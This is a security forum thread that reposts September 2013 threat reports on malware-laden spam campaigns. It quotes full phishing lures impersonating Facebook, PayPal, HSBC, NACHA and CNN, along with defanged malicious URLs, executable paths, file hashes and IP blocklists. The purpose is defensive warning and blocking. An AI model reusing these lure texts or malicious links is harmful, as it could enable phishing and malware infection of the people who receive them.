- http://www.threattracksecurity.com/it-blog/breaking-bad-spam-lurks-on-note-pasting-site/
Sep 3, 2013 - "... fresh links being dumped across a site designed to let users paste notes and images then share with their friends, in a similar manner to Pastebin... frantic posting of links galore... The site itself has Bidvertiser ads placed above and below the “watch now” graphic, which may cause end-users to think they’re related to the image. Not so – clicking the “Download” button took us to an internet speed test. Clicking the Breaking Bad image took us to a second Tumblr which is so excited about offering up ads that it ends up sliding a scroll ad right behind the survey splash.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste3.jpg
... They just can’t decide what they want you to click on first! Another link takes end-users to a video player install complete with various advertising related additions.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste4.jpg
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste5.jpg
... As with all of these spam runs, you’re better off avoiding. At best, you’ll end up with some terrible grainy rip of a TV show on some free file host (after filling in a bunch of offers); at worst, you’ll end up with no TV show, unwanted installs and advert clickthroughs which lead to who-knows-where (after filling in a bunch of offers)."
___

Facebook News feed Suggestion Spam
- http://threattrack.tumblr.com/post/60178964754/facebook-news-feed-suggestion-spam
Sep 3, 2013 - "Subjects Seen:
Hi <name>, here are some Pages you may like
Typical e-mail details:
Like these Pages to get updates in your News Feed...

Malicious URLs
iecc .com .au/complying/index.html
pictondental .com .au/hilda/index.html
ladiscoteca .org/john/index.html
bonway-onza .com/thalami/index.html
watchfp .mobi/topic/able_disturb_planning.php
mvwebsites .com .au/bmSe4BN.exe
mystatesbororealestate .com/rhdkD6.exe
mit-stolz-vorbei-dollbergen .de/w8BDM.exe
petrasolutions .com/JpVsf.exe

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/70eeb14216ad4eeb475912677f4f64a4/tumblr_inline_msk090lk5B1qz4rgp.png

:mad: :fear::fear:

AplusWebMaster
2013-09-04, 14:26
FYI...

Facebook SPAM / watchfp .net
- http://blog.dynamoo.com/2013/09/facebook-spam-watchfpnet.html
4 Sep 2013 - "All this malware-laden Facebook spam is boring. Here's another one, leading to a malicious payload on watchfp .net:
Date: Tue, 3 Sep 2013 11:37:14 -0700 [14:37:14 EDT]
From: Facebook [notification+zrdohvri=vd1 @facebookmail .com]
Subject: Blake Miranda tagged 5 photos of you on Facebook
facebook
Blake Miranda added 5 photos of you.
See photos
Go to notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

Blake is pretty feminine looking for a bloke:
> https://lh3.ggpht.com/-qWsaS5oax8Y/UiZl5ycfTdI/AAAAAAAAB2M/YGE-dNgQjlo/s1600/facebook4.png
The photograph is stolen from the website of Ashot Gevorkyan [some pictures perhaps nsfw] who has quite a nice porfolio. Anyway.. the link in the email uses a shortening service:
[donotclick]u .to/r05nBA which goes to
[donotclick]www.rosenberger-kirwa .de/triassic/index.html which loads one of the following:
[donotclick]safbil .com/stashed/flout.js
[donotclick]ftp.spectrumnutrition .ca/sunscreens/copping.js
[donotclick]schornsteinfeger-helmste .de/covetously/turk.js
The final step is that the victim ends up on a malware landing page at [donotclick]watchfp .net/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 192.81.134.241 (Linode, US) along with some other hijacked domains listed in italics below. The attack is characteristic of the ThreeScripts series of malicious spam emails.
Recommended blocklist:
192.81.134.241
watchfp .org
watchfp .mobi
watchfp .net
safbil .com
ftp.spectrumnutrition .ca
schornsteinfeger-helmste .de "
___

Something evil on 174.140.168.239
- http://blog.dynamoo.com/2013/09/something-evil-on-174140168239.html
4 Sep 2013 - "The server at 174.140.168.239 (DirectSpace Networks LLC, US) is currently hosting a large number of hijacked GoDaddy domains and is being used to distribute malware [1] [2] [3].
It looks like this server has been active for a couple of months and has been used for a variety of evil purposes, I strongly recommend blocking the following:
174.140.168.239 ..."
(More listed at the dynamoo URL above.)

1) http://urlquery.net/search.php?q=174.140.168.239&type=string&start=2013-06-20&end=2013-09-04&max=400

2) https://www.virustotal.com/en-gb/ip-address/174.140.168.239/information/

3) http://blog.dynamoo.com/2013/06/hp-spam-hpscan06292013398zip-fail.html
___

Something very wrong with Gandi US (AS29169 / 173.246.96.0/20)
- http://blog.dynamoo.com/2013/09/something-is-very-wrong-with-gandi-us.html
4 Sep 2013 - "Recently I have been suggesting reader block quite a few individual IPs at Gandi in the US, but I hadn't noticed exactly how many IPs I had been suggesting until a couple of days ago. The problem seems to exist in the 173.246.96.0/20 block of AS29169 (173.246.96.0 - 173.246.111.255), a range of IP addresses that houses very many legitimate domains. Unfortunately, it also houses several malicious servers in the 173.246.102.0/24, 173.246.103.0/24 and 173.246.104.0/24 ranges, alongside legitimate sites... the warnings I have given about this IP range just in this blog alone* (ignoring all external sources)... Google prognosis**... there are a load of legitimate sites interspersed with the malware. Of course, you may want to block chunks of this IP range anyway and live with the collateral damage.. if you are hosted in this range then I suggest it is time to look for a new host. Over the past 12 months there have been at least 25 malware servers in this block, with 173.246.102.0/24 hosting 5, 173.246.103.0/24 hosting 8 and 173.246.104.0 hosting 9. Something must be seriously wrong at Gandi to allow this to happen.
Recommended blocklist:
173.246.102.2
173.246.102.202
173.246.102.223
173.246.102.250
173.246.103.47
173.246.103.191
173.246.103.232
173.246.104.52
173.246.104.55
173.246.104.104
173.246.104.128
173.246.104.154
173.246.104.184
173.246.104.185 ..."
(Long list of URLs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Gandi

** http://www.google.com/safebrowsing/diagnostic?site=AS:29169
___

Fake PayPal SPAM / dshapovalov .info
- http://blog.dynamoo.com/2013/09/paypal-spam-dshapovalovinfo.html
4 Sep 2013 - "This fake (and badly formatted) fake PayPal spam email leads to malware on dshapovalov .info:
Date: Wed, 4 Sep 2013 08:33:25 -0500 [09:33:25 EDT]
From: PayPal [service@ int. paypal .com]
Subject: History of transactions #PP-011-538-446-067
ID
Transaction: { figure } {SYMBOL }
On your account malicious activity , for 1 hour was filmed around $ 100 , in small amounts In order to avoid blocking the account you need to go in. Authenticate Now
Sincerely, Services for protection
Department
PayPal does not tolerate fraud or illegal activities. Your complaint It was noted in the minutes of PayPal user you reported . If we find that This user has violated our policies , we will investigate and take appropriate action. In this case , you can contact in the future status this complaint.
To ensure that future transactions proceed smoothly, we suggest you visit PayPal site and click the Security Center link located at the top of any page. There you will find tips on how to avoid scammers " Fraud Prevention Tips for Buyers " section.
Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance , log in to your PayPal account and click the Help link in the upper right corner of any page PayPal.
Copyright © 1999-2013 PayPal. All rights reserved.
PPID PP {DIGIT } The history of monetary transactions

The link in the email goes through a URL shortening service at [donotclick]url7 .org/KRh - one annoying feature with this service is that you have to click through a form to get the link, so it isn't easy to see where you are going to land. In this case it is [donotclick]184.168.56.23 /observatories/index.html and then it runs one of the following three scripts:
[donotclick]81.143.33.169 /garrotting/rumples.js
[donotclick]northeastestateagency .co .uk/queues/relaxes.js
[donotclick]mineralmizer.webpublishpro ,com/peps/dortmund.js
From there, the victim is sent to a hijacked GoDaddy domain at [donotclick]dshapovalov.info/topic/able_disturb_planning.php hosted on 192.81.134.241 (Linode, US) which is the same server used in this attack*. There are other hijacked GoDaddy domains on the same domain...
Recommended blocklist:
192.81.134.241
watchfp .org
watchfp .mobi
journeyacrossthesky .com
dshapovalov .info
watchfp .net
dshapovalov .info
mineralmizer.webpublishpro .com
northeastestateagency .co .uk
81.143.33.169 "
* http://blog.dynamoo.com/2013/09/facebook-spam-watchfpnet.html

Current PayPal related Spam Ploys
- http://threattrack.tumblr.com/post/60269257866/current-paypal-related-spam-ploys
Sep 4, 2013 - "Subjects Seen:
Resolution of case #PP-<random>
With your balance was filmed - 500 $ -Resolution of case #PP-<random>
Identity Issue #PP-<random>
History of transactions #PP-<random>
Typical e-mail details:
Resolution of Case:
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably. For more details please see on the page View all details
Sincerely,
Protection Services Department ..."

Malicious URLs
ervinscarpet .com/impartially/index.html
jp-intarsia .de/concurred/index.html
hadjis-law .com/creamy/index.html
taylorandgregory .co .uk/assent/index.html
shiing01.x-y .net/stopping/index.html
fonotape.com .ar/bosun/index.html
fonotape.com .ar/supplicate/index.html
dshapovalov .info/topic/able_disturb_planning.php
dshapovalov .info/forum/viewtopic.php
petrasolutions .com/JpVsf.exe
mystatesbororealestate .com/rhdkD6.exe
mvwebsites .com .au/bmSe4BN.exe

Screenshots: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8f9dd09dcd52a551aa1a9a1d67e8035b/tumblr_inline_msltkrWOF91qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/268629cbc000450e262f18991b58d388/tumblr_inline_mslu2htvkm1qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/356a262119b3aaa8e9e4a97cd666a70e/tumblr_inline_mslu3jsH031qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/359086776870e0b49d03e36c88d3077d/tumblr_inline_mslu4ypOP01qz4rgp.png
___

Fake HSBC SPAM / Original Copy (Edited).zip
- http://blog.dynamoo.com/2013/09/hsbc-spam-original-copy-editedzip.html
4 Sep 2013 - "This fake HSBC spam links to a malicious ZIP file:
Date: Wed, 4 Sep 2013 01:45:17 -0700 [04:45:17 EDT]
From: HSBC Wire Advising service [wireservice@ hsbc .com .hk]
Reply-To: hsbcadviceref@ mail .com
Subject: HSBC Payment Advice Ref: [H6789000] / ACH Credits / Customer Ref: [PO780090] (Edited)
Dear Sir/Madam,
The attached payment advice is issued at the request of our customer. The advice is for your reference only.
Kindly Accept Our apology On the copy we sent earlier.
1 attachments (total 586 KB)
View slide show (1)
Download all as zip
Yours faithfully,
Global Payments and Cash Management
HSBC ...

Screenshot: https://lh3.ggpht.com/-Oj2DePefzfQ/UidKx0UPuHI/AAAAAAAAB4A/kpV1gytxjg8/s1600/hsbc.png

The link in the email goes to a file sharing site at [donotclick]ge .tt/api/1/files/1AFpS3r/0/blob?download and then downloads a file Original Copy (Edited).zip which contains a malicious executable Original Copy (Edited).scr (actually a renamed .EXE file, not a screensaver). The VirusTotal detection rate is 14/16*. The malware uses various techniques to prevent being analysed in a sandbox, but the ThreatExpert report** shows some network activity including a suspect connection to ftp.advice .yzi .me (185.28.21.26, Hostinger International US) which might be worth blocking."
* https://www.virustotal.com/en-gb/file/ea61bbf9195c4887a3f52273f0b811a96b4eb39a2956faa6e15d92afff36c09b/analysis/1378306613/

** http://www.threatexpert.com/report.aspx?md5=e7a3e70ca76f5445e898215a282488de

- https://www.virustotal.com/en/ip-address/185.28.21.26/information/

:mad: :fear:

AplusWebMaster
2013-09-05, 20:35
FYI...

More Fake Facebook SPAM / kapcotool .com
- http://blog.dynamoo.com/2013/09/facebook-spam-kapcotoolcom.html
5 Sep 2013 - "This fake Facebook spam leads to malware on kapcotool.com:
From: Facebook [no-reply@ facebook .com]
Date: 5 September 2013 15:21
Subject: Michele Murdock wants to be friends with you on Facebook.
facebook
Michele Murdock wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request ...

The -link- in the email uses an obscure URL shortening serving to go first to [donotclick]fenixa .com/97855 and then to [donotclick]magic-crystal .ch/normalized/index.html, and at this point it attempts to load the following three scripts:
[donotclick]00398d0.netsolhost .com/mcguire/forgiveness.js
[donotclick]202.212.131.8 /ruses/nonsmokers.js
[donotclick]japanesevehicles .us/vector/internees.js
The final step is a malware landing page at [donotclick]kapcotool .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 74.207.227.154 (Linode, US) along with some other hijacked domains...
Recommended blocklist:
74.207.227.154
jgburgerlounge .ca
jngburgerjoint .ca
jngburgerjoint .com
johnmejalli .com
justcreature .com
justmonster .com
kalcodistributors .com
kapcotool.com00398d0.netsolhost .com
japanesevehicles .us
202.212.131.8 "

- https://www.virustotal.com/en/ip-address/74.207.227.154/information/
___

NACHA SPAM / nacha-ach-processor .com
- http://blog.dynamoo.com/2013/09/nacha-spam-nacha-ach-processorcom.html
5 Sep 2013 - "This fake NACHA spam... leads to malware on nacha-ach-processor .com:
From: The Electronic Payments Association - NACHA [leansz35@ inbound .nacha .com]
Date: 5 September 2013 17:55
Subject: Rejected ACH transfer
The ACH transaction (ID: 985284643257), yesterday sent from your account (by one of your account members), was cancelled by the recipient's bank.
Cancelled transaction
ACH ID: 985284643257
Rejection Reason See additional info in the statement below
Transaction Detailed Report View Report 985284643257
About NACHA
NACHA occupies a unique role in the association world, serving as both an industry trade association and administrator of Automated Clearing House (ACH) Network. As the industry trade association that oversees the ACH Network, NACHA provides services in three key functional areas:
The NACHA Operating Rules provide the legal foundation for the exchange of ACH payments and ensure that the ACH Network remains efficient, reliable, and secure for the benefit of all participants. In its role as Network administrator, NACHA manages the rulemaking process and ensures that proposed ACH applications are consistent with the Guiding Principles of the ACH Network. The rulemaking process provides a disciplined, well-defined methodology to propose and develop and propose rules amendments to the NACHA voting membership, the decision makers for the NACHA Operating Rules.
NACHA develops and implements a comprehensive, end-to-end risk management framework that includes network entry requirements, ongoing requirements, enforcement, and ACH Operator tools and services. Collectively, the strategy addresses risk and quality in the ACH Network by minimizing unauthorized entries and customer services costs to all Network participants.
14560 Sunny Valley Drive, Suite 204
Herndon, VA 20171
© 2013 NACHA - The Electronic Payments Association

The link in the email goes through a legitimate -hacked- site and then attempts to direct visitors to [donotclick]www.nacha-ach-processor .com/news/ach-report.php (report here**) which is hosted on the following IPs:
66.230.163.86 (Goykhman And Sons LLC, US)
95.111.32.249 (Megalan / Sofia Mobiltel EAD, Bulgaria)
194.42.83.60 (Interoute Hosting, UK)
The IPs in use identify it as belonging to what I call the Amerika gang*. There are several other malicious domains on these same IPs, and they form part of this larger group of dangerous IPs and domains*.
Recommended blocklist:
66.230.163.86
95.111.32.249
194.42.83.60 ..."
(More listed at the dynamoo URL above.)

* http://blog.dynamoo.com/search/label/Amerika

** http://urlquery.net/report.php?id=4976262
___

Citizens Bank Issue File Processed Spam
- http://threattrack.tumblr.com/post/60376948329/citizens-bank-issue-file-processed-spam
Sep 5, 2013 - "Subjects Seen:
Issue File <random> Processed
Typical e-mail details:
Regarding Issue File <random> -
Total Issue Items # 36 Total Issue Amount $38,043.98
This will confirm that your issue file has been processed. Please verify the information in attached report; if you find there are discrepancies in what you believe your totals should be and what we have reported, please contact the Reconciliation Department at 1-888-333-2909 Option # 3 between the hours of 8:00am and 4:00pm ET not later than 24 hours after you receive this notice.

Malicious File Name and MD5:
issue_report_<random>.zip (1189CEBD553088A94EC3BC2ECB89D34B)
issue_report_<date>.exe (6C66CAE230E0772B75A327AE925F648A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f5818d25ae6d60cd7ddad29a290953d5/tumblr_inline_mso1f929LQ1qz4rgp.png
___

Websense - Java/Flash research - Dangerous Update Gap...
- http://community.websense.com/blogs/securitylabs/archive/2013/09/05/new-java-and-flash-research-shows-a-dangerous-update-gap.aspx
5 Sep 2013 - "... Nearly 50 percent of -enterprise- traffic used a Java version that was more than two years out of date... Nearly 40 percent of users are not running the most up-to-date versions of Flash... nearly 25 percent of Flash installations are more than six months old, close to 20 percent are outdated by a year and nearly 11 percent are two years old..."

:mad: :sad:

AplusWebMaster
2013-09-06, 16:01
FYI...

Something evil on 37.59.164.209 (OVH)
- http://blog.dynamoo.com/2013/09/something-evil-on-3759164209-ovh.html
6 Sep 2013 - "37.59.164.209 is a server operated by OVH in France. It has many malicious domains hosted on it, indeed almost everything on it is flagged by Google as being malicious (highlighted in the list below). Blocking access to that IP address is the simplest approach as the malicious sites do seem to be in some flux..."
(Long list of URLs at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/37.59.164.209/information/
___

CNN Breaking News SPAM: “The United States began bombing!”
- http://threattrack.tumblr.com/post/60455017144/cnn-breaking-news-spam-the-united-states-began
Sep 6. 2013 - "Subjects Seen:
CNN: “The United States began bombing”
Typical e-mail details:
(CNN) — Pentagon officials said that the United States launched the first strikes against Syria. It was dropped about 15 bomn on stalitsu syria Damascus. Full story »
Rescuing Hannah Anderson
*Sushmita Banerjee was kidnapped and killed in Afghanistan, police say
*No one has claimed responsibility for her death, but police suspect militants
*Banerjee wrote “A Kabuliwala’s Bengali Wife” about her escape from the Taliban

Malicious URLs
nevisconservatories .co .uk/soupy/index.html
axsysfinancial .biz/mingle/index.html
holatorino .it/favor/index.html
luggagepoint .de/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9c019d6af9e4c0ccc006be202891c543/tumblr_inline_mspnesVMT61qz4rgp.png

- http://blog.dynamoo.com/2013/09/cnn-united-states-began-bombing-spam.html
6 Sep 2013 - "This fake CNN spam leads to malware on luggagepreview .com:
Date: Fri, 6 Sep 2013 11:30:57 -0600 [13:30:57 EDT]
From: CNN [BreakingNews@ mail .cnn .com]
Subject: CNN: "The United States began bombing"
The United States began bombing!
By Casey Wian, CNN
updated 9:01 AM EDT, Wed August 14, 2013 ...

Screenshot: https://lh3.ggpht.com/-BbuqrJRRbjc/UioW1yo_RwI/AAAAAAAAB50/04oyPrWRzGc/s1600/cnn-bombing.png

The link in the email is meant to go to [donotclick]senior-tek .com/tenth/index.html but the "Full story" link has a typo in and goes to senior-tekcom/tenth/index.html (without the dot) instead which obviously fails. This site then tries to load these three scripts:
[donotclick]crediamo .it/disburse/ringmaster.js
[donotclick]stages2saturn .com/scrub/reproof.js
[donotclick]www.rundherum .at/rabbiting/irritate.js
From there the visitor is sent to a malicious payload at [donotclick]luggagepreview .com/topic/able_disturb_planning.php which is a hacked GoDaddy domain hosted on 174.140.171.207 (DirectSpace LLC, US) along with several other hijacked domains...
Recommended blocklist:
174.140.171.207 ..."

- https://www.virustotal.com/en/ip-address/174.140.171.207/information/

- http://www.symantec.com/connect/fr/blogs/chemical-attack-syria-used-enticement-targeted-attack
6 Sept 2013
___

"Scanned Document Attached" SPAM / FSEMC.06092013.exe
- http://blog.dynamoo.com/2013/09/scanned-document-attached-spam.html
6 Sep 2013 - "This fake financial spam contains an encrypted attachment with a malicious file in it.
Date: Fri, 6 Sep 2013 15:19:37 +0000 [11:19:37 EDT]
From: Fiserv [Lawanda_Underwood@ fiserv .com]
Subject: FW: Scanned Document Attached
Dear Business Associate:
Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center - a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.
You have an important message from Adam_Paul@ fiserv .com
To see your message, use the following password to decrypt attached file: JkSIbsJPPai
If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password.
This message will be available until Saturday Sep 07, 2013 at 17:50:42
EDT4
If you have any questions, please contact your Fiserv representative...

Attached is an encrypted ZIP file which contains part of the victim's email address (or somebody else in the same domain) that has to be decrypted with the password JkSIbsJPPai. This in turn contains a malicious executable FSEMC.06092013.exe (note the date is encoded into the filename). The VirusTotal detection rate for this malware is only 6/47*. The malware then phones home to a site ce-cloud.com:443 hosted on 84.22.177.37 (ioMart, UK) and then uploads some data... What happens next is unclear, but you can guarantee that it is nothing good. Blocking access to ce-cloud .com or 84.22.177.37 may provide some protection. Blocking EXE-in-ZIP files is an even more effective approach if you can do it."
* https://www.virustotal.com/en/file/6fcd54235ec7883cd551d9f8b043d5b9ce82832e0e476c8b2c4a79e5f228eb30/analysis/1378501983/
___

More new Facebook SPAM / www .facebook.com.achrezervations .com
- http://blog.dynamoo.com/2013/09/facebook-spam-wwwfacebookcomachrezervat.html
6 Sep 2013 - "This fake Facebook spam leads to malware on www .facebook.com.achrezervations .com:
Date: Fri, 6 Sep 2013 08:07:14 -0500 [09:07:14 EDT]
From: Facebook [notification+puppies9@ mail .facebookmail .net]
Reply-To: noreply [noreply@ postmaster .facebookmail .org]
Subject: Cole Butler confirmed your Facebook friend request
facebook
Cole Butler has confirmed that you're friends on Facebook.
You may know some of Cole's Friends
Daren Douglas
1 mutual friends
Add Friend
Gertrude Souza
14 mutual friends
Add Friend
Brice Kelly
3 mutual friends
Add Friend ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe...

Screenshot: https://lh3.ggpht.com/-vdq1WhJkOzY/Uinn23pxApI/AAAAAAAAB5k/mb7uFKXCU2I/s1600/facebook.png

The link in the email goes to a legitimate -hacked- site and then to an exploit kit on [donotclick]www.facebook.com.achrezervations .com/news/implement-circuit-false.php (report here*) hosted on the following servers:
66.230.163.86 (Goykhman And Sons LLC, US)
95.111.32.249 (Megalan / Sofia Mobiltel EAD, Bulgaria)
115.78.233.220 (Vietel Corporation, Vietnam)
194.42.83.60 (Interoute Hosting, UK)
The following IPs and domains are all malicious and belong to this gang**, I recommend you block them:
66.230.163.86
95.111.32.249
115.78.233.220
194.42.83.60 ..."
(More URLs listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=4996887

** http://blog.dynamoo.com/search/label/Amerika
___

Threat Outbreak Alerts cover the latest data regarding malicious email-based and web-based threats, including spam, phishing, viruses, malware, and botnet activity.
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Account Payment Notification Email Messages - 2013 Sep 06
Fake Bank Payment Transfer Notification Email Messages - 2013 Sep 06
Fake Product Quote Email Messages - 2013 Sep 06
Fake Order Payment Confirmation Email Messages - 2013 Sep 05
Fake Airline Ticket Order Notification Email Messages - 2013 Sep 05
Email Messages with Malicious Link - 2013 Sep 05
Fake Photo Sharing Email Messages - 2013 Sep 05
Fake Money Transfer Notification Email Messages - 2013 Sep 05
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 05
Fake Product Order Confirmation Email Messages - 2013 Sep 05
Fake Invoice Notification Email Messages - 2013 Sep 05
Fake Document Attachment Email Messages - 2013 Sep 05
Fake Shipping Notification Email Messages - 2013 Sep 05
Email Messages with Malicious Attachments - 2013 Sep 05
Fake Shipping Confirmation Email Messages - 2013 Sep 05
Fake Scanned Document Attachment Email Messages - 2013 Sep 05
Fake Product Purchase Request Email Messages - 2013 Sep 05
Fake Personal Picture Sharing Email Messages - 2013 Sep 05
Fake Product Order Email Messages - 2013 Sep 05
Fake Electronic Payment Cancellation Email Messages - 2013 Sep 05
(More detail and links available at the cisco URL above.)

:mad: :fear::fear:

AplusWebMaster
2013-09-07, 19:07
FYI...

Quotation.zip SPAM with malicious VBS script
- http://blog.dynamoo.com/2013/09/dealerbidcouk-quotationzip-spam-with.html
7 Sep 2013 - "The website dealerbid.co .uk has been compromised and their servers -hacked- in order to send spam to their customer list. Something similar has happened before a few months ago*. In this case the spam email was somewhat mangled, but I am assuming that the spammers know how to fix this. The spam email is as follows:
From: Christopher Rawson [christopher.r@ kema .com]
Date: 7 September 2013 14:04
Subject: Quotation
Hello,
We have prepared a quotation, please see attached
With Kind Regards,
Christopher Rawson,
DNV KEMA Energy & Sustainability ...

DNV KEMA is a real, legitimate company in the energy sector. But they did not send the spam, an examination of the headers shows that the sending IP is 213.171.204.75 which is the same IP as www .dealerbid .co .uk and mail.dealerbid .co .uk. The email is sent to an address ONLY used to register at dealerbid .co .uk. So, the upshot is that this domain is compromised and it is compromised right now. The email is meant to have an attachment called Quotation.zip but in my sample the email was mis-formatted and instead the Base 64 encoded ZIP file was in the main body text... Some copy-and-pasting and work with a Base 64 decoder ended up with a valid ZIP file, containing a somewhat obfuscated VBS script Quotation.vbs with a low VirusTotal detection rate of 4/46**... it attempts to download further components from klonkino.no-ip .org (port 1804) which is hosted on 146.185.24.207 (Hosting Services Inc, UK). I strongly recommend blocking no-ip .org domains in any case, but I certainly recommend the following blocklist:
klonkino.no-ip .org
146.185.24.207 ... "

* http://blog.dynamoo.com/2013/03/dealerbidcouk-spam.html

** https://www.virustotal.com/en/file/46472cd1655cc46dc31b026960edf6b50afa9384a9d8e83d63e2eb73d5230f02/analysis/1378571897/

- https://www.virustotal.com/en/ip-address/146.185.24.207/information/
___

Adware spread with Mevade variants ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/us-taiwan-most-affected-by-mevade-malware/
Sep 6, 2013 - "... rise in the number of Tor users... directly attributed to the Mevade malware... The first batch of Mevade samples (detected as BKDR_MEVADE.A) we gathered was downloaded by a malicious file named FlashPlayerUpdateService.exe (detected as TROJ_DLOADE.FBV). (The legitimate Flash updater uses the same file name.) The two files can be differentiated by examining the file properties. The legitimate version is signed, while the malicious version is not. In addition, the version numbers are different... The backdoor communicates to its C&C server via HTTP to receive commands, which include updating a copy of itself and connecting to a specific location using SSH to secure its communication... The IP addresses that host these C&C servers are located in Russia. Looking into the feedback data provided by the Smart Protection Network, TROJ_DLOADE.FBV was found in multiple countries, with Japan and the United States being the most affected... In addition to the Mevade malware itself, we saw that ADW_BPROTECT had also been downloaded onto affected systems. This is expected for Mevade, as we noted earlier that it is linked to cybercriminals responsible for the distribution of adware. This downloading of adware is consistent with our findings that the Mevade botnet is possibly monetized via installing -adware- and -toolbars- ... Newer versions of Mevade (BKDR_MEVADE.B and BKDR_MEVADE.C) no longer use SSH; instead they use the Tor network to hide their network traffic. This can help cover their activity online, but otherwise the behavior and propagation is identical... How the malware arrives into the system, however, is still under investigation. We will update the blog should we find more information about the infection vector. Still, users must observe best computing practice and to -avoid- visiting and downloading files from unverified websites or links from email, social media etc..."

:mad: :fear::fear:

AplusWebMaster
2013-09-09, 18:57
FYI...

Malware sites to block 9/9/13
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913.html
9 Sep 2013 - "These domains and IPs are associated with this gang*, this list supersedes (or complements) the one I made last week**..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-2913.html
___

Malware sites to block 9/9/13, part II
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913-part-ii.html
9 Sep 2013 - "Another set of IPs and domains related to this attack* detailed by Sophos, and overlapping slightly with the malicious servers documented here**. I've just listed the main domains, but the attack itself uses thousands of subdomains (e.g. zwgaf72d4erv7g.www5.tohk5ja .cc) to do evil things.
46.20.36.9 (Syslayer.com, Germany)
74.63.229.252 (Limestone Networks / 123systems Solutions, US)
77.81.244.226 (Elvsoft SRL, Netherlands)
173.243.118.198 (Continuum Data Centers, US)
198.52.243.229 (Centarra Networks, US)
199.188.206.183 (Namecheap Inc, US)
206.72.192.31 (Interserver Inc, US)
213.156.91.110 (Ukrainian Special Systems Network, Ukraine)
Blocklist:
46.20.36.9
74.63.229.252
77.81.244.226
173.243.118.198
198.52.243.229
199.188.206.183
206.72.192.31
213.156.91.110 ..."
(Long list at the dynamoo URL above.)
* https://secure2.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ADKW/detailed-analysis.aspx

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913.html
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Shipping Notification Email Messages - 2013 Sep 09
Fake Processed Payment Notification Email Messages - 2013 Sep 09
Fake Account Payment Notification Email Messages - 2013 Sep 09
Fake Important Documents Notification Email Messages - 2013 Sep 09
Fake Anti-Phishing Email Messages - 2013 Sep 09
Fake Product Order Email Messages - 2013 Sep 09
Fake Real Estate Inquiry Email Messages - 2013 Sep 09
Fake Bank Payment Transfer Notification Email Messages - 2013 Sep 09
Fake Shipping Confirmation Email Messages - 2013 Sep 09
Fake Bank Transfer Notice Email Message - 2013 Sep 09
Fake Invoice Statement Attachment Email Messages - 2013 Sep 09
Fake Product Order Quotation Email Messages - 2013 Sep 09
Fake Business Complaint Notification Email Messages - 2013 Sep 09
Fake Product Purchase Order Email Messages - 2013 Sep 09
Fake Product Order Request Email Messages - 2013 Sep 09
Fake Letter of Intent Attachment Email Messages - 2013 Sep 09
Fake Product List Attachment Email Messages - 2013 Sep 09
Fake Account Deposit Notification Email Messages - 2013 Sep 09
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 09
Fake Purchase Order Request Email Messages - 2013 Sep 09
(More detail and links at the cisco URL above.)

:mad::fear:

AplusWebMaster
2013-09-10, 17:52
FYI...

Fake FISC ACH SPAM / fiscdp.com.airfare-ticketscheap .com
- http://blog.dynamoo.com/2013/09/ach-file-id-999107-has-been-processed.html
10 Sep 2013 - "This fake FISC ACH spam leads to malware on www .fiscdp .com.airfare-ticketscheap .com:
Date: Tue, 10 Sep 2013 17:05:49 +0530 [07:35:49 EDT]
From: Financial Institution Service [improvehv89@ m.fiscdp .gov]
Subject: ACH file ID "999.107" has been processed successfully
Files FISC Processing Service
SUCCESS Notification
We have successfully handled ACH file 'ACH2013-09-09-62.txt' (id '999.107') submitted by user '[redacted]' on '2013-09-09 12:06:67.7'.
FILE SUMMARY:
Item count: 9
Total debits: $13,365.83
Total credits: $13,365.83 ...

Screenshot: https://lh3.ggpht.com/-Iz3whiN6ueg/Ui8p3ZBdj8I/AAAAAAAAB6U/vbU8dZM88fM/s400/fisc.png

The link in the email goes to a legitimate -hacked- site and then on to a malware landing page at [donotclick]www.fiscdp .com.airfare-ticketscheap .com/news/opens_heads_earlier.php (reports here* and here**) hosted on:
66.230.163.86 (Goykhman And Sons LLC, US)
95.87.1.19 (Trakia Kabel OOD , Bulgaria)
174.142.186.89 (iWeb Technologies)
The WHOIS details for airfare-ticketscheap .com are -fake- and the domain was registered just yesterday... The IPs in use indicate that this campaign forms part of the Amerika spam run. Several other malicious sites are on the same server, and I would recommend that you block the following in conjunction with this list:
66.230.163.86
